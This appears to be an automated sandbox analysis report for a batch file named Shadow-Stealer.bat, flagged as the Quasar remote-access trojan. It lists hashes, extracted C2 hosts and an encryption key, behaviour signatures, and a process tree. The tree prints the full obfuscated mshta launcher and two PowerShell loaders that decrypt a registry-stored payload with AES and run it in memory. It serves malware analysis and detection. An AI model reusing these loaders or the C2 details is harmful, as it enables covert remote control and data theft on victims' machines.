Analysis

  • max time kernel
    1800s
  • max time network
    1803s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-05-2024 09:04

General

  • Target

    Shadow-Stealer.bat

  • Size

    12.5MB

  • MD5

    cf5b412ffc3ce43cd7ddce602fc67f56

  • SHA1

    221dfcd0868158f676c472d8a5bcf9647f0c7d51

  • SHA256

    84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

  • SHA512

    695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef

  • SSDEEP

    49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | Tinsler

C2

throbbing-mountain-09011.pktriot.net:22112

167.71.56.116:22112

throbbing-mountain-09011.pktriot.net:5050

Mutex

cf16a257-7d89-4296-8384-8fca3dbb568f

Attributes
  • encryption_key

    045F98A287DD47B8B5C074D234995A2C5A913042

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    1000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 23 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:556
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3455b23a-1e77-4396-b01f-d91fa209e7b4}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4988
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{54e745f9-6d6a-425a-985d-828edb7c0146}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1932
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f4b702ba-50dc-40e9-96d8-424c3f8ee150}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1684
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b65a5e11-da2a-4d2f-856d-f3dd32ba9ec3}
          2⤵
            PID:5116
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{6826c128-6d66-4805-a13c-d36e731fa8f9}
            2⤵
              PID:1604
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{4f5aa893-b7cb-4f72-a561-1c5f695328e0}
              2⤵
                PID:5728
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{db0aa1dd-3628-47d4-b912-759bdfab246d}
                2⤵
                  PID:3892
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{841db114-410f-478e-a5e5-b69122191b90}
                  2⤵
                    PID:6128
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{6435be7b-5708-44a6-ba54-0b98bccdde1d}
                    2⤵
                      PID:5836
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 5836 -s 288
                        3⤵
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:5184
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:692
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:1000
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                        1⤵
                          PID:708
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                          1⤵
                            PID:752
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1076
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1084
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1136
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                  1⤵
                                    PID:1208
                                    • C:\Windows\$sxr-mshta.exe
                                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies registry class
                                      • Suspicious use of WriteProcessMemory
                                      PID:1160
                                      • C:\Windows\$sxr-cmd.exe
                                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:4396
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          4⤵
                                            PID:3568
                                          • C:\Windows\$sxr-powershell.exe
                                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                            4⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            • Suspicious use of WriteProcessMemory
                                            PID:3264
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{f1103143-cf47-4231-9dff-93c0d4e2f17a}
                                              5⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2864
                                            • C:\Windows\$sxr-powershell.exe
                                              "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3264).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2536
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{dea3282c-a49b-461e-9067-79a8adf6ecd7}
                                              5⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:892
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{2f31e55d-e170-4e53-a6ad-b69adbda5ccd}
                                              5⤵
                                                PID:5628
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{e0f8f228-ac5f-4064-abda-4046386f3608}
                                                5⤵
                                                  PID:5172
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{2b748b6f-ecc5-4e4a-90c7-98aa7f08588b}
                                                  5⤵
                                                    PID:5280
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{44898605-52f5-4939-956e-cba3f54bfb22}
                                                    5⤵
                                                      PID:6000
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 472
                                                        6⤵
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:5464
                                                    • C:\Windows\SysWOW64\dllhost.exe
